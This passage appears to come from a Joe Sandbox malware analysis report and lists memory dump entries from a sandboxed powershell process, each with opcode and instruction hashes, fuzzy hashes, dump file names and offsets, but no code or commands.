                          • Opcode Fuzzy Hash: 027532667577e08fbda7a4e24430d0d8010b6074c47e279f5002704f58eed227
                          • Instruction Fuzzy Hash: FD417C71A406048FEB14DB64C854AAEBBF6AF89720F14546CE806EB7A0DF35EC42CB50
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4ed480d1412b742bf0d832384abc85656161a7d3cf398371a89f7226bba42fc0
                          • Instruction ID: 70e9d46297ab8bcaf1d4bc1be139e1d72569fcc24153da34581ba016875fa94f
                          • Opcode Fuzzy Hash: 4ed480d1412b742bf0d832384abc85656161a7d3cf398371a89f7226bba42fc0
                          • Instruction Fuzzy Hash: BE51F535A04258AFDB04DF98D480A9CFBF2FF49320F159559E819AB351C731ED86CB90
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d6cad1769137469e12d482f3dbcea6ccce4078ee54dcb31511c2b45faf7463b
                          • Instruction ID: 560b6339c96d0d5dc09c5faee5a28ecb4691bfef4301e35f785eb9e9bba4b80d
                          • Opcode Fuzzy Hash: 3d6cad1769137469e12d482f3dbcea6ccce4078ee54dcb31511c2b45faf7463b
                          • Instruction Fuzzy Hash: CC4138B0E002099FDB14DFA9C9847ADBBF2BF88314F14842DD806AB794DB74AC85CB50
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a1b5533cc23fb1907e6ad7ed5710d22103fedb6c861b2389cc6fba366630cf6
                          • Instruction ID: faa352167374c72b06a0c8f1bc9272f1e27f865e214ef99adb40c8fd4a26ca96
                          • Opcode Fuzzy Hash: 3a1b5533cc23fb1907e6ad7ed5710d22103fedb6c861b2389cc6fba366630cf6
                          • Instruction Fuzzy Hash: C04108B4A005059FCB06CF99C5989AAFBB1FF4C310B25859AD905AB364C736FC50CFA0
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1f5df8207f1df318a844fda8db547b8f33d5ea66c96c3bac1aee28cf96f5405d
                          • Instruction ID: 3f98f6a495c78ef166e20b10bcd37d3a28e7553969ff4d9d7bf1a551b341063f
                          • Opcode Fuzzy Hash: 1f5df8207f1df318a844fda8db547b8f33d5ea66c96c3bac1aee28cf96f5405d
                          • Instruction Fuzzy Hash: 1331C5B0741218AFD7189778C955FAE7BA3AB85340F10C468EA017F7A5CE76DC428BD1
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d90639df7448b9b956a7d112332a45d2891adb542dddc0eafe2ce6b575ce903e
                          • Instruction ID: 37cb1849c9f7ee9a4405b54cd6bcfd78b3088ad2755fac003e5f89289bbd9666
                          • Opcode Fuzzy Hash: d90639df7448b9b956a7d112332a45d2891adb542dddc0eafe2ce6b575ce903e
                          • Instruction Fuzzy Hash: F5218EB176036B7BDB345979C841B3BB6C59BC8700F24C43AA905CF384DD75D9469361
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 84059dd1f87ce9d43df14f212e52dcf16f4caab4c33949e9858c86975973e92a
                          • Instruction ID: 7ce662df54f524d8639af696b5728ad5fc0b323ba3e9308b5cf53287e53ab9bb
                          • Opcode Fuzzy Hash: 84059dd1f87ce9d43df14f212e52dcf16f4caab4c33949e9858c86975973e92a
                          • Instruction Fuzzy Hash: B1313730A011688FCF25DB64C894AEEB7F2BF89305F1554E9D40AAB251DF35AE81DF81
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4d56c86899b3a66ffbfaaff9c16af10bf371c184708e3236a949aba390bebde
                          • Instruction ID: 2465153c946a8275d910c7ca13974cc600578ce29c1963fb88a5d3704a7f13e2
                          • Opcode Fuzzy Hash: a4d56c86899b3a66ffbfaaff9c16af10bf371c184708e3236a949aba390bebde
                          • Instruction Fuzzy Hash: 25315AB5A042559FCB05DF58C8948AAFFF1FF89310B15459AE848EB362C331ED41CBA0
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ab859e220b28c8050886916d2c5108c2f6d25c52dbfd3e96c308d827fa793ee
                          • Instruction ID: fdefaebf18b0a22d4aa1dc0bb5c3f86b06245af92df8ffff27a248b04859cd68
                          • Opcode Fuzzy Hash: 5ab859e220b28c8050886916d2c5108c2f6d25c52dbfd3e96c308d827fa793ee
                          • Instruction Fuzzy Hash: A221E1B132839A7BD7340A76C8517767FA19F86300F288467E844CF2D2DE38C956C361
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0fbd2a07880576693b762bda331daa1f04c67d45730099469f018df006fadabf
                          • Instruction ID: 24d3f0ea441ebb26fac34fb38f65dc15cd6d19bf009ccd891e831c4dc4e71fb1
                          • Opcode Fuzzy Hash: 0fbd2a07880576693b762bda331daa1f04c67d45730099469f018df006fadabf
                          • Instruction Fuzzy Hash: 20210575A042099FCB00CF59C9809AEFBF1FB48310B24856AE819EB761C735EC42CBA0
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72dd15f357ce27c550b882df58481f691e1186c5a39bda208d8f06b657b2a227
                          • Instruction ID: 16200b6b53ddedc67ab8a83c9ea01f1d16d8541682e03d17c8bb907518e2ab62
                          • Opcode Fuzzy Hash: 72dd15f357ce27c550b882df58481f691e1186c5a39bda208d8f06b657b2a227
                          • Instruction Fuzzy Hash: 3F01207632022B6BCB3459A9D40067BFB95DFC1621F14C43FD945CB250D672E447D7A0
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a335899cd3f943fc8112916dfc3915869f939b18f703ea02dbd30a12aadfb21a
                          • Instruction ID: 98f531c6b616cd2b92b451589fe6de896f0d3910c234c5dd3e4596200129da8f
                          • Opcode Fuzzy Hash: a335899cd3f943fc8112916dfc3915869f939b18f703ea02dbd30a12aadfb21a
                          • Instruction Fuzzy Hash: 5C115631D10159DBEF24DA94E5987ECB7F1AF4531DF24342AC411F6190EB746C8ACB16
                          Memory Dump Source
                          • Source File: 00000009.00000002.4211916657.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_29ed000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d9ab37e6c38e493b3e5620cad3a257f87f6d27b7b88ae72a66cf695272363a24
                          • Instruction ID: f13e01b0c00ddac3ba742617e680e3e31839ee74a480db0b2746cd17b1208399
                          • Opcode Fuzzy Hash: d9ab37e6c38e493b3e5620cad3a257f87f6d27b7b88ae72a66cf695272363a24
                          • Instruction Fuzzy Hash: C9012B71009300AAEB114A25CD84767BFDCEF41325F0CC929EC4A0F186C379D941C6B1
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fdbb6f1a695409a5ac8c27753bbd4eff334f0478dba2a5826fc31942bd0ac9a5
                          • Instruction ID: 5a2733f6c481a3b40701ecd4bcc43febf31c34cdcd38c6efc7483a84e61a7f32
                          • Opcode Fuzzy Hash: fdbb6f1a695409a5ac8c27753bbd4eff334f0478dba2a5826fc31942bd0ac9a5
                          • Instruction Fuzzy Hash: 27018474B406149FCB00CF98C480AAEF7B1FF8D300B218599D41A97361C636EC038B50
                          Memory Dump Source
                          • Source File: 00000009.00000002.4211916657.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_29ed000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1f76deb09e5a102c6289d28afefd7b1687bbd4b4677601272af92f71e4b317cc
                          • Instruction ID: cfe882973c29b442b05f7e16e087991a90d626d68180a67975901d38da44da7d
                          • Opcode Fuzzy Hash: 1f76deb09e5a102c6289d28afefd7b1687bbd4b4677601272af92f71e4b317cc
                          • Instruction Fuzzy Hash: 75F0C271005340AEEB118A16CD84B62FFACEB41235F18C55AED480E286C3799845CAB1
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b4529ffa44934527c14fa49e0c22230617ad48eba0e69b78837b4b82c3f868e5
                          • Instruction ID: 8d2df828e42b06f34dbbbed064d8a6c4b8fa03f61d3276c822722da809fb4137
                          • Opcode Fuzzy Hash: b4529ffa44934527c14fa49e0c22230617ad48eba0e69b78837b4b82c3f868e5
                          • Instruction Fuzzy Hash: 13E092F4664252BBC715DBA4C811952FBA1FF8D20071C818ED0484F267DE66D943D711
                          Memory Dump Source
                          • Source File: 00000009.00000002.4211916657.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false